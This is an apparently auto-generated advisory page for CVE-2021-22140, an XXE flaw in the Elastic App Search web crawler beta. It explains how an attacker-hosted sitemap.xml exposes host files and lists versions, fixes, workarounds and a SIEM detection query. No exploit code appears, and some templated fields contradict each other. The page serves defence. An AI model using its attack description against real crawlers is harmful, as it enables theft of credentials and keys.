CVE-2021-22140 – This XXE vulnerability in Elastic App Search's ... (How to Fix)

Q: What is the severity of CVE-2021-22140?

CVE-2021-22140 has a CVSS score of 7.5 (HIGH). This XXE vulnerability in Elastic App Search's web crawler beta feature allows attackers to read sensitive files on the host system. Attackers can exploit this by hosting a malicious sitemap.xml that gets crawled by App Search. Only organizations using the web crawler beta feature on affected versions are impacted.

📋 TL;DR

This XXE vulnerability in Elastic App Search's web crawler beta feature allows attackers to read sensitive files on the host system. Attackers can exploit this by hosting a malicious sitemap.xml that gets crawled by App Search. Only organizations using the web crawler beta feature on affected versions are impacted.

💻 Affected Systems

Products:

Elastic App Search

Versions: Versions after 7.11.0 and before 7.12.0

Operating Systems: All platforms running Elastic App Search

Default Config Vulnerable: ✅ No

Notes: Only affects systems with the web crawler beta feature enabled and actively crawling websites.

📦 What is this software?

Elastic App Search by Elastic

View all CVEs affecting Elastic App Search →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete filesystem traversal leading to exposure of sensitive files like SSH keys, configuration files, and credentials stored on the host.

🟠

Likely Case

Partial filesystem access allowing attackers to read application configuration files and potentially discover other vulnerabilities.

🟢

If Mitigated

Limited impact if web crawler is disabled or only crawls trusted internal sites.

🌐 Internet-Facing: HIGH - Web crawlers typically access external websites, making exploitation trivial if malicious sitemaps exist.

🏢 Internal Only: MEDIUM - Risk exists if crawling internal sites, but requires attacker access to internal infrastructure.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires the attacker to control a website being crawled by App Search, making it situational but technically simple.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.12.0 or later

Vendor Advisory: https://discuss.elastic.co/t/7-12-1-security-update/271433

Restart Required: Yes

Instructions:

1. Upgrade Elastic App Search to version 7.12.0 or later. 2. Restart the App Search service. 3. Verify the version is updated.

🔧 Temporary Workarounds

Disable Web Crawler Beta Feature

all

Disable the vulnerable web crawler feature until patching is possible.

Edit App Search configuration to disable web crawler or remove crawler configurations

Restrict Crawling to Trusted Sites

all

Configure the crawler to only access known, trusted websites.

Update crawler configuration to whitelist specific domains only

🧯 If You Can't Patch

Disable the web crawler beta feature entirely
Implement network segmentation to isolate App Search from sensitive systems

🔍 How to Verify

Check if Vulnerable:

Check if App Search version is between 7.11.0 and 7.12.0 and web crawler is enabled.

Check Version:

curl -X GET 'http://localhost:3002/api/ent/v1/internal/engine' | grep version

Verify Fix Applied:

Verify App Search version is 7.12.0 or later and test crawling functionality.

📡 Detection & Monitoring

Log Indicators:

Unusual file access patterns in system logs
XXE parsing errors in App Search logs

Network Indicators:

Crawler requests to suspicious or unexpected domains

SIEM Query:

source="app-search" AND ("sitemap.xml" OR "XXE" OR "external entity")

📊 Metadata

CVE ID: CVE-2021-22140

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE: CWE-611

Published: May 13, 2021

Last Updated: November 21, 2024

🔗 References

https://discuss.elastic.co/t/7-12-1-security-update/271433 Vendor Advisory
https://discuss.elastic.co/t/7-12-1-security-update/271433 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-22140, you might also want to check these: